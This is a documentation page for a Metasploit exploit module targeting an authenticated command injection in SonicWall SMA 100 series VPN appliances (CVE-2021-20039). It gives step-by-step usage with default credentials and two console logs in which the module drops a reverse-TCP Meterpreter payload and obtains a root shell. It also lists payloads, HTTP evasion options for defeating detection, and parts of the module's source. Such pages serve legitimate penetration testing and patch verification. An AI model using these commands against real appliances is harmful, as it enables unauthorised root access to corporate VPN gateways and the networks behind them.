SonicWall SMA 100 Series Authenticated Command Injection - Metasploit


This page contains detailed information about how to use the exploit/linux/http/sonicwall_cve_2021_20039 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: SonicWall SMA 100 Series Authenticated Command Injection
Module: exploit/linux/http/sonicwall_cve_2021_20039
Source code: modules/exploits/linux/http/sonicwall_cve_2021_20039.rb
Disclosure date: 2021-12-14
Last modification time: 2022-01-11 03:17:45 +0000
Supported architecture(s): x86
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-20038, CVE-2021-20039

This module exploits an authenticated command injection vulnerability in the SonicWall SMA 100 series web interface. Exploitation results in command execution as root. The affected versions are: - 10.2.1.2-24sv and below - 10.2.0.8-37sv and below - 9.0.0.11-31sv and below

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/sonicwall_cve_2021_20039
msf exploit(sonicwall_cve_2021_20039) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Description

This module exploits an authenticated command injection vulnerability in the SonicWall SMA 100 series web interface. Exploitation results in command execution as root. The affected versions are:

  • 10.2.1.2-24sv and below
  • 10.2.0.8-37sv and below
  • 9.0.0.11-31sv and below

Installation

SonicWall SMA 500v 10.2.1.0-sv17 on VMWare Fusion


  • Download 10.2.1.0-sv17 from: https://software.sonicwall.com/Firmware/sw_smavm_eng_10.2.1.0_10.2.1_p_17sv_1268045.ova
  • From Fusion, import the downloaded ova.
  • Start the VM.
  • Log in to the command line interface using "admin" and "password".
  • Hit "1" for "Setup Wizard".
  • Configure the device with an appropriate address, gateway, and netmask (the device doesn't use DHCP).
  • Done!

Verification Steps


  • Follow the above instructions to install SMA 500v
  • Do: use exploit/linux/http/sonicwall_cve_2021_20039
  • Do: set RHOST <ip>
  • Do: check
  • Verify the remote target is flagged as vulnerable
  • Do: set LHOST <ip>
  • Do: exploit
  • You should get a Meterpreter session.

Options


USERNAME

The username to authenticate to the web server with. The default value is "admin".

PASSWORD

The password to authenticate to the web server with. The default value is "password".

PORTALNAME

The name of the SMA portal to authenticate to. The default value is "VirtualOffice".

SWDOMAIN

The name of the domain to authenticate to. The default is "LocalDomain".

Scenarios


SMA 500v 10.2.1.1-19sv. Default creds. Get Meterpreter session.

msf6 > use exploit/linux/http/sonicwall_cve_2021_20039
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set RHOST 10.0.0.7
RHOST => 10.0.0.7
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > check

[*] Version found: 10.2.1.1-19sv
[*] 10.0.0.7:443 - The target appears to be vulnerable. Based on the discovered version.
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set LHOST 10.0.0.9
LHOST => 10.0.0.9
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > exploit

[*] Started reverse TCP handler on 10.0.0.9:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version found: 10.2.1.1-19sv
[+] The target appears to be vulnerable. Based on the discovered version.
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Authentication successful
[*] Command Stager progress -   1.42% done (36/2533 bytes)
- truncated -
[*] Command Stager progress -  98.07% done (2484/2533 bytes)
[*] Sending stage (984904 bytes) to 10.0.0.7
[*] Meterpreter session 2 opened (10.0.0.9:4444 -> 10.0.0.7:58293 ) at 2021-11-17 10:56:30 -0800
[*] Command Stager progress -  99.37% done (2517/2533 bytes)
[*] Command Stager progress - 100.00% done (2533/2533 bytes)

meterpreter > getuid
Server username: root
meterpreter > shell
Process 6708 created.
Channel 1 created.
uname -a
Linux sslvpn 3.13.3 #1 SMP Mon Aug 9 11:13:43 GMT 2021 i686 i686 i386 GNU/Linux
id
uid=0(root) gid=99(nobody) groups=0(root),99(nobody)

SMA 500v 9.0.0.10-28sv. Non-default creds. Get Meterpreter session.

msf6 > use exploit/linux/http/sonicwall_cve_2021_20039
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > check

[*] Version found: 9.0.0.10-28sv
[*] 10.0.0.6:443 - The target appears to be vulnerable. Based on the discovered version.
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set LHOST 10.0.0.9
LHOST => 10.0.0.9
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > exploit

[*] Started reverse TCP handler on 10.0.0.9:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version found: 9.0.0.10-28sv
[+] The target appears to be vulnerable. Based on the discovered version.
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Authentication successful
[*] Command Stager progress -   1.42% done (36/2533 bytes)
- Truncated -
[*] Command Stager progress -  98.07% done (2484/2533 bytes)
[*] Sending stage (984904 bytes) to 10.0.0.6
[*] Meterpreter session 1 opened (10.0.0.9:4444 -> 10.0.0.6:38833 ) at 2021-11-17 11:00:29 -0800
[*] Command Stager progress -  99.37% done (2517/2533 bytes)
[*] Command Stager progress - 100.00% done (2533/2533 bytes)

meterpreter > getuid
Server username: root
meterpreter > shell
Process 24220 created.
Channel 1 created.
uname -a
Linux sslvpn 3.1.0 #1 SMP Thu Feb 18 15:44:36 GMT 2021 i686 i686 i386 GNU/Linux
id
uid=0(root) gid=99(nobody) groups=0(root),99(nobody)

Go back to menu.

Msfconsole Usage


Here is how the linux/http/sonicwall_cve_2021_20039 exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/sonicwall_cve_2021_20039

[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > show info

       Name: SonicWall SMA 100 Series Authenticated Command Injection
     Module: exploit/linux/http/sonicwall_cve_2021_20039
   Platform: Linux
       Arch: x86
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-12-14

Provided by:
  jbaines-r7

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Linux Dropper

Check supported:
  Yes

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  PASSWORD    password         yes       The password to authenticate with
  PORTALNAME  VirtualOffice    yes       The portal to log in to
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT       443              yes       The target port (TCP)
  SRVHOST     0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
                                          on all addresses.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  SWDOMAIN    LocalDomain      yes       The domain to log in to
  TARGETURI   /                yes       Base path
  URIPATH                      no        The URI to use for this exploit (default is random)
  USERNAME    admin            yes       The username to authenticate with
  VHOST                        no        HTTP server virtual host

Payload information:

Description:
  This module exploits an authenticated command injection 
  vulnerability in the SonicWall SMA 100 series web interface. 
  Exploitation results in command execution as root. The affected 
  versions are: - 10.2.1.2-24sv and below - 10.2.0.8-37sv and below - 
  9.0.0.11-31sv and below

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-20039
  https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026
  https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2
  https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis

Module Options


This is a complete list of options available in the linux/http/sonicwall_cve_2021_20039 exploit:

msf6 exploit(linux/http/sonicwall_cve_2021_20039) > show options

Module options (exploit/linux/http/sonicwall_cve_2021_20039):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   PASSWORD    password         yes       The password to authenticate with
   PORTALNAME  VirtualOffice    yes       The portal to log in to
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT       443              yes       The target port (TCP)
   SRVHOST     0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
                                          n on all addresses.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SWDOMAIN    LocalDomain      yes       The domain to log in to
   TARGETURI   /                yes       Base path
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME    admin            yes       The username to authenticate with
   VHOST                        no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.170  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux Dropper

Advanced Options


Here is a complete list of advanced options supported by the linux/http/sonicwall_cve_2021_20039 exploit:

msf6 exploit(linux/http/sonicwall_cve_2021_20039) > show advanced

Module advanced options (exploit/linux/http/sonicwall_cve_2021_20039):

   Name                    Current Setting                            Required  Description
   ----                    ---------------                            --------  -----------
   AutoCheck               true                                       no        Run check before exploit
   CMDSTAGER::DECODER                                                 no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                       no        The CMD Stager to use. (Accepted: auto, echo, printf)
   CMDSTAGER::SSL          false                                      no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                    no        Writable directory for staged files
   ContextInformationFile                                             no        The information file that contains context information
   DOMAIN                  WORKSTATION                                yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                       no        Conform to IIS, should work for most servers. Only set to false for non-IIS
                                                                                servers
   DisablePayloadHandler   false                                      no        Disable the handler code for the selected payload
   EXE::Custom                                                        no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                      no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                      no        Use the default template in case the specified one is missing
   EXE::Inject             false                                      no        Set to preserve the original EXE function
   EXE::OldMethod          false                                      no        Set to use the substitution EXE generation method.
   EXE::Path                                                          no        The directory in which to look for the executable template
   EXE::Template                                                      no        The executable template file name.
   EnableContextEncoding   false                                      no        Use transient context when encoding payloads
   FingerprintCheck        true                                       no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                      no        Override check result
   HttpClientTimeout                                                  no        HTTP connection and receive timeout
   HttpPassword                                                       no        The HTTP password to specify for authentication
   HttpRawHeaders                                                     no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                      no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                    no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                      no        Show HTTP headers only in HttpTrace
   HttpUsername                                                       no        The HTTP username to specify for authentication
   ListenerComm                                                       no        The specific communication channel to use for this service
   MSI::Custom                                                        no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                      no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                          no        The directory in which to look for the msi template
   MSI::Template                                                      no        The msi template file name
   MSI::UAC                false                                      no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                          no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                      no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                       yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-nego
                                                                                tiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                      no        Return a robots.txt file if asked for one
   URIHOST                                                            no        Host to use in URI (useful for tunnels)
   URIPORT                                                            no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/5.0 (Macintosh; Intel Mac OS X 12  no        The User-Agent header to use for all requests
                           _0_1) AppleWebKit/605.1.15 (KHTML, like G
                           ecko) Version/15.0 Safari/605.1.15
   VERBOSE                 false                                      no        Enable detailed status messages
   WORKSPACE                                                          no        Specify the workspace for this module
   WfsDelay                2                                          no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x86/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   MeterpreterTryToFork         false            no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  true             no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directl
                                                           y to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/sonicwall_cve_2021_20039 module can exploit:

msf6 exploit(linux/http/sonicwall_cve_2021_20039) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/sonicwall_cve_2021_20039 exploit:

msf6 exploit(linux/http/sonicwall_cve_2021_20039) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/ssh/interact                                       normal  No     Interact with Established SSH Connection
   5   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   6   payload/linux/x86/adduser                                          normal  No     Linux Add User
   7   payload/linux/x86/chmod                                            normal  No     Linux Chmod
   8   payload/linux/x86/exec                                             normal  No     Linux Execute Command
   9   payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   10  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   11  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   12  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   13  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   14  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   15  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   16  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   17  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   18  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   19  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   20  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   21  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   22  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   23  payload/linux/x86/read_file                                        normal  No     Linux Read File
   24  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   25  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   26  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   27  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   28  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   29  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   30  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   31  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   32  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   33  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   34  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   35  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   36  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   37  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/sonicwall_cve_2021_20039 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/sonicwall_cve_2021_20039) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u
                                                            -all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Failed to retrieve the version information


Here is a relevant code snippet related to the "Failed to retrieve the version information" error message:

82:	  def check
83:	    res = send_request_cgi({
84:	      'uri' => normalize_uri(target_uri.path, '/cgi-bin/welcome'),
85:	      'agent' => 'SonicWALL Mobile Connect'
86:	    })
87:	    return CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200
88:	
89:	    version = res.body.match(/\.([0-9.\-a-z]+)\.js" type=/)
90:	    return CheckCode::Unknown('Failed to retrieve the version information') unless version
91:	
92:	    version = version[1]

Failed to retrieve the version information


Here is a relevant code snippet related to the "Failed to retrieve the version information" error message:

85:	      'agent' => 'SonicWALL Mobile Connect'
86:	    })
87:	    return CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200
88:	
89:	    version = res.body.match(/\.([0-9.\-a-z]+)\.js" type=/)
90:	    return CheckCode::Unknown('Failed to retrieve the version information') unless version
91:	
92:	    version = version[1]
93:	
94:	    major, minor, revision, build = version.split('.', 4)
95:	    build, point = build.split('-', 2)

Based on the discovered version.


Here is a relevant code snippet related to the "Based on the discovered version." error message:

111:	        return CheckCode::Safe
112:	      end
113:	    else
114:	      return CheckCode::Safe
115:	    end
116:	    CheckCode::Appears('Based on the discovered version.')
117:	  end
118:	
119:	  def login
120:	    res = send_request_cgi({
121:	      'method' => 'POST',

Login failed


Here is a relevant code snippet related to the "Login failed" error message:

132:	        'ajax' => 'true'
133:	      },
134:	      'keep_cookies' => true
135:	    })
136:	
137:	    fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200
138:	    fail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=')
139:	    print_good('Authentication successful')
140:	  end
141:	
142:	  ##

Login failed


Here is a relevant code snippet related to the "Login failed" error message:

133:	      },
134:	      'keep_cookies' => true
135:	    })
136:	
137:	    fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200
138:	    fail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=')
139:	    print_good('Authentication successful')
140:	  end
141:	
142:	  ##
143:	  # Send the exploit in the "CERT" field when "deleting" a certificate. The

Only expected 200 OK


Here is a relevant code snippet related to the "Only expected 200 OK" error message:

165:	    }, 5)
166:	
167:	    if res && res.code != 200
168:	      # the response should always be 200, unless meterpreter holds the
169:	      # connection open.
170:	      fail_with(Failure::UnexpectedReply, 'Only expected 200 OK')
171:	    end
172:	  end
173:	
174:	  def exploit
175:	    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • jbaines-r7

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.